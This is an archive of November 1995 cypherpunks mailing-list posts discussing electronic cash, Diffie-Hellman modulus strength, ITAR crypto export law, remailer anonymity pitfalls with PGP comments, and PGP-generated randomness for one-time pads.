Subject: (fwd) CIS TALK THIS THURSDAY, Nov 9th 4 p.m. in 518
Message-ID: <v02120d10acc58ab75501@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Sorry about the forward, but you'll see why in a sec...

Cheers,
Bob

--- begin forwarded text

Date: Tue, 7 Nov 1995 15:22:34 -0500
To: bsdc@ai.mit.edu
Subject: [joanne@theory.lcs.mit.edu: CIS TALK THIS THURSDAY, Nov 9th 4 p.m.
in 518]
Sender: bounce-bsdc@ai.mit.edu
Precedence: bulk


From: joanne@theory.lcs.mit.edu (Joanne Talbot)
Date: Tue, 07 Nov 95 11:57:15 EST
To: theory-seminars@theory.lcs.mit.edu
Reply-To: theory-seminars-request@theory.lcs.mit.edu
Subject: CIS TALK THIS THURSDAY, Nov 9th 4 p.m. in 518

**Seminar of interest!!

CIS Seminar:    Thursday, Nov. 9th
Place:          NE43-518
Refreshments:   4:00 p.m.
Talk:           4:15 p.m.

Title:          Electronic Cash
Author:         Stefan Brands from CWI

Abstract:
        Two approaches for electronic payments prevail; one focusses
on the secure transmission of creditcard numbers and is account-based,
while the other is token-based and tries to mimic the way coins or
cheques are traded. The first approach can be realized using
elementary cryptographic techniques, but offers at best anonymity of
payments against merchants and requires on-line payment verification.
On-line payment verification can be expensive and become the
bottleneck of a large-scale implementation.

The second approach, electronic cash, can offer full anonimity of
payments, but requires fairly complex cryptographic techniques in
order to guarantee security. Pioneering work in this area has been
done by David Chaum. Unfortunately, his techniques are practical only
for on-line electronic payments and hence less appropriate for
large-scale implementation.

In my presentation I will discuss the design of practical electronic
cash systems that have off-line payment ability.

Further information can be found on: http://www.cwi.nl/~brands/

Host: Ronald Rivest
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Wed, 8 Nov 1995 10:07:19 +0800
To: bal@martigny.ai.mit.edu
Subject: Re: Photuris Primality verification needed
In-Reply-To: <1999.bsimpson@morningstar.com>
Message-ID: <199511080143.RAA22564@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> Our practical experiences with discrete logs suggests that the effort
> required to perform the discrete log precomputations in (a) is slightly
> more difficult than factoring a composite of the same size in bits.  In
> 1990-91 we estimated that performing (a) for a k-bit prime modulus was
> about as hard as factoring a k+32-bit composite.  [Recent factoring work
> has probably changed this a bit, but it's still a good estimate.]

This is also my understanding, which I got from you in the first
place.  I take it there have been no dramatic breakthroughs in the
last few years in the discrete log problem? How heavily has it been
studied in comparison with factoring?

Yes, in theory once an attacker spends enough time precomputing a
table for a particular modulus he can then attack individual DH key
exchanges with ease. This seems entirely analogous to attacking
RSA. If you spend the time up front to factor my public RSA key, then
you can also easily attack individual messages to me.

So if I am willing to rely on a PGP key of, say, 1024 bits then I
should be equally willing to rely on a 1024-bit DH modulus.

Now there is admittedly a practical difference here -- people *can*
change their PGP RSA keys occasionally, though this is hard to do when
you have a lot of signatures.  And each user has his/her own PGP RSA
key, and cracking that gives you only the traffic to that user.  A
public DH modulus will be shared by many more people -- making it a
much more tempting target.

Still, requiring support of a fixed modulus for shared public use is
important to promote a basic level of interoperability. This has its
risks, but it should be okay *provided* it's a strong prime of
sufficient strength to preclude the precomputation of the discrete log
tables by even a highly motivated and resourceful attacker. And as a
backup the protocol should provide for the optional use of private
moduli between consenting parties. Sound reasonable?

Phil







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Wed, 8 Nov 1995 10:07:27 +0800
To: bsimpson@morningstar.com
Subject: Re: Photuris Primality verification needed
In-Reply-To: <1999.bsimpson@morningstar.com>
Message-ID: <199511080146.RAA22568@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


>Hilarie Orman posted that 512-bits only gives an order of 56-bits
>strength, 1024-bits yeilds 80-bits strength, and 2048 yields 112-bits
>strength.  I do not have the facilities to verify her numbers.

>As most of us agree that 56-bits is not enough (DES), the 512-bit prime
>seems a waste of time and a tempting target.  I'd like to drop it, but
>Phil is inclined to keep it with a disclaimer.

Well, since we already require 56-bit DES in ESP in the interests of
promoting basic interoperability, wouldn't a 512-bit prime be
similarly sufficient?

Again, I'm *not* going to recommend that people use it, only provide it
for those who simply cannot use larger moduli for whatever reason (export
controls or CPU limits).

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 8 Nov 1995 07:28:57 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
In-Reply-To: <199511062222.RAA14762@yakko.cs.wmich.edu>
Message-ID: <199511072307.SAA10176@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


frogfarm@yakko.cs.wmich.edu writes:
[re: http://dejanews.com]
> Having said that, I'm greatly looking forward to the impending addition
> of the alt.* groups to their archives. Everyone is indeed a Kibo now,
> and the general public has become more aware of the need for reputations
> as a result.

They now have some alt.*. They've got my rmgroup of 
alt.wild.sex.with.cute.nonAIDSinfected.interesting.sonsofbitches, which 
suggests they've done a pretty thorough job for some time period.

As others have noted, this has clearly been coming for a long time. 
Pseudonymous accounts like Community Connexion's are a partial solution. But
I expect an expansion of the market for strongly pseudonymous mail aliases,
providing fewer services for cheaper rates. It's not enough just to separate 
your True Name (verinym) from your name on the net. Many will want to use 
tentacles (*), er, separate pseudonyms for discussions in different parts of 
the net. After all, I might not want the c'punks to hear about my past life as
a control freak (pun intended) in alt.config. Just a reminder....

-L. Futplex McCarthy  Remailer Feedback Page: 
                      http://www.cs.umass.edu/~lmccarth/remailers/feedback.html

(*) Speaking of tentacles, Dejanews reveals that my name is on the long list
of people whose signatures have been appropriated by Detweiler ;)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Whitaker <whitaker@sover.net>
Date: Wed, 8 Nov 1995 08:20:37 +0800
To: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: toolkits?
Message-ID: <199511072351.SAA03354@maple.sover.net>
MIME-Version: 1.0
Content-Type: text/plain


Thanks, Daniel, for a thoughtful response.

At 08:18 AM 11/7/95 CST, Daniel R. Oelke wrote:

>First off - avoid trying to legislate minute details of any encryption
>or signature scheme.  Bureaucrats trying to understand, much less control
>technical things is doomed to fail.  (take GOSIP as a prime example)
>

I didn't mean to suggest that government would be responsible to get it right.
It is possible to show them how it's done though.


>Second - push for legal acceptance of digital signatures and
>acceptance of privacy through encryption.  I believe Utah has taken a strong 
>step in this direction.  Most people, businesses, and courts won't accept
>digital contracts and the like until there is more of a sound
>set of laws behind them.  

This is good as it can be pitched as economic development. Any good models?
Where to find the UTAH language? Pitfalls to watch out for?

>Strong laws against government snooping or
>against anti-encryption or anti-anonymous laws are a good thing IMO.

This will probably be tough in the current environment. Again, any good
language available? Fortunately Vermont is small enough where anyone can get
a bill printed and introduced if it is properly drafted.

What did the recent US Supreme court decide in support of anonymity?

>
>Third - provide services to the citizenry.  For example - provide
>a public key server.  Or how about a digital time-stamping service.
>If the crap was kept out of these services, and they were free for
>anyone to use, then it would advance the idea of encouraging people to
>use crypto in their daily lives.
>

Now were getting specific. These are things that us ordinary folk can do
which show the 'leaders' how to follow. What software, hardware,
applications, support and sysadmin experience is required and where is it
available on what terms. What are the cash flow opportunities to support
such services?

>Warning - Although I think there are some good things that governments
>can do, it is also very important to watch out for "sabotage" by 
>the government.  Governments tend to like control too much and by
>trying to maintain control, reverse a useful service to one that
>is a dis-service to the people.  In general, if governments get
>out of the way, people will take care of problems themselves.
>

Agreed. That why after five or six years of trying to get the privacy laws
passed, and watching government drag anchor, I started fishin the
cypherpunks list for some pragmatic solutions to everyday situations.

I'd still like to be pointed to some toolkits/reference works which will
teach me how to access and use available information (or data) to map the
net performance, message paths, transmission delay times, sniffers active, etc.

-sw





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 8 Nov 1995 11:28:16 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
Message-ID: <199511080306.TAA10540@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995 lmccarth@cs.umass.edu wrote:

> your True Name (verinym) from your name on the net. 
> Many will want to use 
> tentacles (*), er, separate pseudonyms for discussions in different parts of 
> the net. After all, I might not want the c'punks to hear about my past life
> as a control freak (pun intended) in alt.config. Just a reminder....
> 

> (*) Speaking of tentacles, Dejanews reveals that my name is on the long list
> of people whose signatures have been appropriated by Detweiler ;)

You too, eh??

I wish that Detweiler could (seriously) go back to wherever he came from. 
Hopefully this time, he can make the attempt ... backwards. 

I no longer become incensed at his type of spoofing.  I understand that a
message may look like it appears to come from a site, but it in fact
doesn't.  Who really knows??  

Even a message that is PGP signed isn't guaranteed to be from the person
who apparently signed it.  Someone might have a web server that asks
Netscape Navigator (very politely) to send out someone's secret PGP keyring,
or asks Navigator to monitor a person's keystrokes when they enter their
password, or heaven forbid their electronic daytimer.

Once you have that, it's easy to send a forged PGP SIGNED email.  Even 
worse, most readers of email will tend to believe that an electronic 
signature is prima facie evidence that a message is from who it 
appears to be from.

It just doesn't work that way.  

You have to look at the message and use "fuzzy" logic to determine how
probable it is that a given message is from the person who it represents
itself as coming form.  And sometimes, you'll be wrong.

Just like the good old, "Dr. Frederick B. Cohen", who posted to this list. 

Is he really the Dr. Cohen, noted international computer virus expert, the
very man who coined the term "computer virus", or isn't he?  Is he the man
who the US military approached to verify whether missile guidance systems
could be compromised by a foreign power utilizing a trojan horse or virus,
or not.  Do we believe his web page?? 

Even if we do, do we place a greater degree of trust in his words, than
that of say, yours truly, Alice de 'nonymous, or of someone who claims to 
be Tim May when they BOTH say that there are very serious flaws and 
deficincies in the Netscape Navigator product?  Or do we infer that a 
"no comment" coming from AT&T and Netscape, acts as confirmation that 
the *information* in the post is reliably correct.

It's impossible to say with certainty.

Maybe if someone on this mailing list attended Dr. Cohen's talk today at 
the Hilton Hotel, in Washington, D.C., and fills us in with what he said, 
(if we can trust _that_ poster) and we independently verify for ourselves
whether what _he_ (Dr. Cohen or Mr. Confirmation) is saying *seems* to be
reasonable, then we _might_ be able to say that we _may_ be reasonably
certain, that we DO have an international celebrity amongst us and posting
to this list, and notifying the world of a serious problem.

I mean what would you expect, a Press Release??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 10 Nov 1995 15:41:48 +0800
To: djw@pdcorp.com
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <199511080054.QAA29419@email.pdcorp.com>
Message-ID: <199511080135.UAA05624@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dan Weinstein wrote:

| The what U.S. law says and what U.S. officials can enforce are two
| different things.  You are in violation of ITAR if you send crypto
| software from Mexico to Europe over the INTERNET if it is routed
| through the U.S..  Think of it like drugs being shipped through the
| U.S., the drug lord that sent it throught is just as guilt under U.S.

	Its worth noting that IP is a packet routing system.  It does
not use paths or virtual circuits, like ATM or X.25.  This means that
it is not always possible to predict what route packets will follow.
This is especially true of non-interactive protocols like SMTP.  I can
traceroute to get a good idea of where my ftp packets are going right
now, but between the time I do the traceroute, send a mail message,
and it actually gets transmitted, a router somewhere along my old path
might have died, and my packets, unbeknownst to me, are taking a new
path.

	Thus, if the user in Italy has no reason to expect that their
mail to Germany will traverse the US, then I suspect that the US would
have a hard time proving any criminal act.  Doesn't a criminal act
require intent of some type?  If IP routing, in conjunction with SMTP,
beyond the control of the users, ships packets through the US, I have
a hard time believing that that makes those users criminals.


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 8 Nov 1995 23:52:25 +0800
To: cypherpunks@toad.com
Subject: Re: Newt on Crypto
Message-ID: <199511080454.UAA08566@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>From John Young's posting CYB_lip of a column from the Washington Post

>   "At some point in the not-very-distant future," said
>   Speaker Newt Gingrich (R-Ga.) in an August interview in
>   Wired with computer guru Esther Dyson, "somebody is going
>   to have encryption you can't break.... Governments are not
>   going to be able to stop it."

Newt's an optimist (from the government perspective.)
At some point in the not-very-distant future, 
_everybody_ is going to have encryption the government can't break!


#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 8 Nov 1995 13:21:55 +0800
To: cypherpunks@toad.com
Subject: PGP Comment feature weakens remailer securityPGP Comment feature weakens remailer security
Message-ID: <199511080454.UAA05765@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Suppose you want to mail or post something sensitive enough
to chain through several remailers with PGP encryption at every stage
to protect the privacy of communications.  PGP can bite you.
The PGP comment feature lets you stick one (or more?) lines of comment
into your encrypted messages, after the Version: line but before the
encrypted message body.  If you use the PGP comment feature to say something
more or less unique (mine says that you can get PGP outside the country
from ftp.ox.ac.uk), anybody eavesdropping the last remailer in your chain
can notice this in the remailer's input and recognize that it's from you,
even though you've chained through six different places to get there.
It's still encrypted, and protected to the extent that the remailer protects
you, but if the remailer is corrupt or your message can be identified 
by size among the other remailer inputs, you're hosed.

So, for safety, either turn off PGP comments before using it 
with remailers, or wipe out the comments by hand  before each layer of encryption
(easy to do with GUI-based systems like Private Idaho; I don't know
if premail lets you do this or not.)

                                      Bill Stewart

-----BEGIN PGP SIGNATURE-----
Version: 2.7.1
Comment: PGP available outside U.S.A. at ftp.ox.ac.uk

iQBVAwUBMKAgw/thU5e7emAFAQFStwH/QnIiiaeSmUp1YynDBLVo3HAWsVkS0nx8
Fc95Mr0YJ/YIoRDz+xuNgLHbjJZSTUbhOnigMRb7JLNqhmCGvS5RBQ==
=ZWhB
-----END PGP SIGNATURE-----

#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 8 Nov 1995 13:07:01 +0800
To: cypherpunks@toad.com
Subject: Re: using pgp to make an otp
Message-ID: <199511080454.UAA08618@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 PM 11/6/95 EST, Derek Atkins <warlord@MIT.EDU> wrote:
>> 	PGP output is not random enough to be used for a one time pad.
>> The security of a OTP is *entirely* based on the quality of the random
>> numbers; they should come from some strong generator.  Building good
>> one time pads is tough, and usually not worth the effort.
>
>No, however the output of "pgp +makerandom=XXX filename.dat" _IS_
>random enough for an OTP.  The problem then becomes distributing this
>data.

amp had written:
| my point here is that _if_ pgp output is random enough, i wouldn't need
| hardware. even i, with my extremely limited programming skills could create
| a .cmd file or program that could be used as input for a stream cypher.

The output of PGP should be random enough for your application,
as long as you don't think you're getting a cryptographically-correct OTP
out of the deal.  PGP uses its randpool stuff in its random number generation,
so there are likely to be at least 24 bytes of real randomness kept around, 
maybe more depending on the size of your randpool, but the rest of
your security comes from algorithm quality and is theoretically crackable
like any pseudo-random sequence (albeit requiring exponentially-large
crackwork.)
It's using IDEA in a feedback mode, so it's better than just repeated MD5s.

The output of PGP +makerandom probably is secure enough for most applications,
depending on how many bits you're using, what you're doing with it,
and how paranoid you need to be.  Check out the code to be sure.
You may have special applications such as amp's stream cypher
for which it's more convenient to XOR the makerandom instead of using PGP,
but watch out for attacks like known-plaintext, which can really bite you
in secure-voice systems where there's a lot of near-silence.
Careless protocol work can spoil really decent random numbers....
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Wed, 8 Nov 1995 04:37:15 +0800
To: perry@piermont.com
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511071907.VAA01462@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


> 
> "Peter D. Junger" writes:
> > : Where the hell did you get that idea? [that the ITAR applies to
> > : foreigners abroad].
> > 
> > >From Section 120.17 of the ITAR which provides:
> > 
> >  _Export_ means:
> > 
> >  . . . .
> > 
> >  (4) Disclosing (including oral or visual disclosure) or transfering
> >  technical data to a foreign person, whether in the United States or
> >  abroad . . . .

Hmm. Not only is this law unenforceable, it is unenforced. Anyone,
non-US or otherwise can buy crypto books - you just can't get the code
on floppy. Bruce Schneier went through this procedure when he CJ'ed
"Applied Cryptography".

\begin{lighter_note}
The illegal bit about (for instance) the munitions T-shirt is that it
has a bar code. _This_ makes it illegal for export, because not only is
it machine washable, it is machine readable.
\end{lighter_note}

Academic exchange of mathematical knowledge has never been under scrutiny.

"Technical data" will have to be interpreted to mean somethiing different,
like details of the inner workings of militart encryption equipment and the
like.

M

--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Murray <mark@grondar.za>
Date: Wed, 8 Nov 1995 04:49:03 +0800
To: perry@piermont.com
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511071925.VAA01520@grumble.grondar.za>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Mark Murray writes:
> > Hmm. Not only is this law unenforceable, it is unenforced. Anyone,
> > non-US or otherwise can buy crypto books - you just can't get the code
> > on floppy. Bruce Schneier went through this procedure when he CJ'ed
> > "Applied Cryptography".
> 
> To my knowledge, Bruce Schneier never CJ'ed "Applied
> Cryptography". Phil Karn did that.

Point is, it got CJ'ed, and easily too. In fact I understand that the
process was 'trivial'. Just the software on floppy was a problem.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark@grumble.grondar.za for PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 8 Nov 1995 11:04:18 +0800
To: cypherpunks@toad.com
Subject: Re: So much for free speech...
Message-ID: <199511080238.VAA29423@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:57 AM 11/6/95 -0800, Timothy C. May wrote:
>Children are usually not accorded full constitutional protections,
>especially not in public schools, but this does not mean the police should
>arrest those who utter the wrong words! (Maybe suspending the student,
>though I certainly wouldn't do that.)

That's the rub.  Kids can be kept locked up even with no crime.  "Children
don't have a right to liberty only a right to custody."  An adult would
probably not get arrested in the same circumstances (cops have more
discretion to push kids around) or if arrested not prosecuted, or if
prosecuted, case dismissed.  

It's a good thing the kid didn't engage in racist/Nazi acts like cutting
government spending and taxes or they would have thrown the book at him.

>This is the "safe and secure" world we are in, where bad thoughts and bad
>words are punished. Or threatened with lawsuits. Anarchy seems infinitely
>preferable to me.

You got that right.

DCF

"Remind me to use an anonymous remailer in the future when indulging in racism."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 8 Nov 1995 11:21:40 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again--a URL for Usenet Searching
Message-ID: <199511080238.VAA29437@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:28 PM 11/6/95 -0800, Timothy C. May wrote:
>
>I usually avoid passing on URLs of interesting sites, in the name of
>conserving bandwidth (*), but this one really has me jazzed:
>
>http://dejanews.com/
>
>It allows searching of Usenet archives (a few months' worth, from what I
>can see).

I'm not impressed since I've been using the subscription version of Infoseek
for a while now which lets you search the last month of News and includes
mailing lists as well (including cypherpunks).  The free version is behind
the Net Search button on Netscape but only searches the Web.

http://www.infoseek.com

A search for tcmay@got.net produced more than 200 hits.  My Tim you *do* get
around.  Modesty prevents me from mentioning any newsgroup names.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Katy Kislitzin <ktk@anemone.corp.sgi.com>
Date: Wed, 8 Nov 1995 14:01:21 +0800
To: cypherpunks@toad.com
Subject: EARLY WARNING: Decemeber SF Bay Area Cyperpunks
Message-ID: <199511080549.VAA04978@anemone.corp.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi--

Eric Messick and I will be holding the Decemeber C'punks meeting at
our geodesic dome in the Santa Cruz Mountains.  It will be a
combination meeting and holiday get-together.  It will be happening on
the usual c'punks saturday, Dec 9, but will start at 4:00 pm instead
of the usual noon.  A more spirited announcement will follow closer to
the date.

--kt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 10 Nov 1995 05:11:02 +0800
To: cypherpunks@toad.com
Subject: Re: Newt on Crypto
Message-ID: <199511080642.WAA04054@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995, Bill Stewart wrote:

> >From John Young's posting CYB_lip of a column from the Washington Post
> 
> >   "At some point in the not-very-distant future," said
> >   Speaker Newt Gingrich (R-Ga.) in an August interview in
> >   Wired with computer guru Esther Dyson, "somebody is going
> >   to have encryption you can't break.... Governments are not
> >   going to be able to stop it."
> 
> Newt's an optimist (from the government perspective.)
> At some point in the not-very-distant future, 
> _everybody_ is going to have encryption the government can't break!

Oviously, Newt missed a briefing somewhere.  His comments leave the
impression that -- in the recent past and even at present -- we only had
encryption which Governments could break.  This is nonsense. 

We've always had encryption which the government couldn't break.  We've
had it in the past.  We have it at present.  And we will have it in the
future. 

We've always had "non-breakable" private communication. 

A simple example.  If I was negotiating at a table with my legal team
around me, and the opposing team across from me, and I wanted to send a
message to my team that is for their eyes only, all I have to do is write
something on the writing pad in front of me, and I have a secure
communications channel to them. 

I can even write it in plain text. 

My team sees it, while the other team doesn't.  This _really_ should not 
surprise anyone ... especially Newt. 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Wed, 8 Nov 1995 09:18:39 +0800
To: Oliver Huf <ohuf@relay.sedat.de>
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <Pine.NXT.3.91.951107144209.255A-100000@oe1>
Message-ID: <199511080054.QAA29419@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995 14:52:33 +0100 (GMT+0100), you wrote:

>
>
>On Tue, 7 Nov 1995, Peter D. Junger wrote:
>
>> >From Section 120.17 of the ITAR which provides:
>> 
>>  _Export_ means:
>>  . . . .
>>  (4) Disclosing (including oral or visual disclosure) or transfering
>>  technical data to a foreign person, whether in the United States or
>>  abroad . . . .
>
>The ITAR is U.S.-Law. This only applies (by definition) to US-citizens
>or persons in the U.S.!
>
>I think it's a common mistake of many Americans that they believe
>creating law means creating law for the whole world!

The what U.S. law says and what U.S. officials can enforce are two
different things.  You are in violation of ITAR if you send crypto
software from Mexico to Europe over the INTERNET if it is routed
through the U.S..  Think of it like drugs being shipped through the
U.S., the drug lord that sent it throught is just as guilt under U.S.
law as the mule that is carrying it.  The problem is that ITAR was not
writen to take the current situation into consideration.  It is writen
to deal with physical equipment and concepts that only a small number
of people understand.  Given those perameters ITAR would work, but
given the current climate of readily available crypto software and
wide spread understanding of crypto technologies ITAR cannot do what
it was designed to do.

>
>> Go read the section that I quoted again.  Where is there an exception
>> for foreign persons who happen to be abroad?  
>
>It's inherent. You simply can't apply US-law to non-US-citizens outside
>the U.S.!  

Quite to the contrary, U.S. law applies whereever the U.S. can enforce
it.  Their are  many U.S. laws that the U.S. attempts to enforce
outside the U.S..  One example is that the U.S. law allows the
abduction of those who have murdered U.S. citizens outside the United
States.  This law is in place in an attempt to protect U.S. citizens
from terorism.  If you do not believe me just ask Manuel Noriega
(sp?).


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@utopia.hacktic.nl (Matthew Ghio)
Date: Fri, 10 Nov 1995 08:30:15 +0800
To: cypherpunks@toad.com
Subject: Re: encrypt-key remailers
In-Reply-To: <Pine.SOL.3.91.951107143109.23860A-100000@gorf.rs.itd.umich.edu>
Message-ID: <199511080318.EAA29662@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Jennifer Mansfield-Jones (cardtris@umich.edu) wrote:

>  ::
>  Encrypt-Key: apasswd
>  Request-Remailing-To: cardtris@umich.edu
>  Subject: reply-block-test
>  
>  **
...

>  
> Trying the above, I find that it does *sort of* work as a reply
> block.  If I append sample text and send everything to
> remailer@flame.alias.net, I get a reply back that looks like, for
> instance: 
>
> Date: Mon, 6 Nov 1995 19:22:13 +0100
> From: Anonymous <nobody@flame.alias.net>
> To: cardtris@umich.edu
> Subject: reply-block-test
>
> **
>
>
> The appended text, which I expected to come back conventionally
> encrypted with 'apasswd', has just vanished into the void.  
> Obviously I'm missing something... probably something that seemed 
> painfully obvious to the writer of the remailer help file.  If I 
> omit the encryption key and '**', I can get reply blocks to work fine,
> even chained through multiple remailers.  Suggestions?

This is a configuration problem at the remailer, most likely a missing 
randseed.bin file.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <netsurf@pixi.com>
Date: Thu, 9 Nov 1995 08:54:31 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: PGP Comment feature weakens remailer security
In-Reply-To: <199511080454.UAA05765@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951108054335.22856D-100000@akamai.pixi.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 7 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> to protect the privacy of communications.  PGP can bite you.
> The PGP comment feature lets you stick one (or more?) lines of comment
> into your encrypted messages, after the Version: line but before the
> encrypted message body.  If you use the PGP comment feature to say something

---- 8< snip

> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.7.1
> Comment: PGP available outside U.S.A. at ftp.ox.ac.uk
> 

You are using Viacrypt PGP, which has a release out which fixes the 
comment "feature" - contact them for an upgrade.

This was fixed in the freeware version some time ago as well.

-NetSurfer

#include <standard.disclaimer>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
==  =     = |James D. Wilson        |V.PGP 2.7:   512/E12FCD 1994/03/17 >
 "  "  o  " |P. O. Box 15432        |     finger for full PGP key        >
 "  " / \ " |Honolulu, HI  96830    |====================================>
\"  "/ G \" |Serendipitous Solutions|    http://www.pixi.com/~netsurf   >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bglassle@kaiwan.com (Bob Glassley)
Date: Wed, 8 Nov 1995 15:13:20 +0800
To: cypherpunks@toad.com
Subject: Lotus Notes RSA Implementation Question
Message-ID: <199511080702.XAA22876@kaiwan.kaiwan.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I am currently considering using Lotus Notes for a group-ware solution
where security is of great importance.  I have studied Notes
documentation regarding thier implementation of the RSA encryption
library, but it leaves some unanswered questions.

If anyone on the list has knowledge of the following items, I would be
very gratefull.

1)  What is the key size used by the USA licensed version?

2)  Considering RC4 is a proprietary scheme, have there been any
concerted efforts to validate it's strength or lack of?  If so, could
you give a pointer to any documents I could review.

...Bob Glassley

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKBVtW7xvKhVs/sNAQHCowP+LF2stvSPzatDfAkKx2DfU8sH5S7p6KwN
PwDEak9it1Uq0eALHWVTc3VZ3WYY+6XIjYNnNyfdKsgehXb+2dVEgjz1qbHyK+uE
3JhlYOeCfBcXUrTbilAoYXghJHvrpJq8z+Pa6u2W5Wgxks+t9MYzjV3YKLM2Nj6Z
y6jbBUcyyNc=
=TN1O
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Curtis <jbell@capecod.net>
Date: Wed, 8 Nov 1995 20:31:36 +0800
To: "'cypherpunks@toad.com>
Subject: expiration dates on cryptography
Message-ID: <01BAADAA.DFB5F740@hy36.capecod.net>
MIME-Version: 1.0
Content-Type: text/plain


The discussion between Mr. May and Mr. Shields concerning
time-release cryptograhy raised an interesting question in my 
mind.

Given that trust is often of an ephemeral nature, it would be
quite useful to set time limits on secrets.  Would it be possible
to cryptographically protect a secret such that it could not be
decrypted after a certain time?

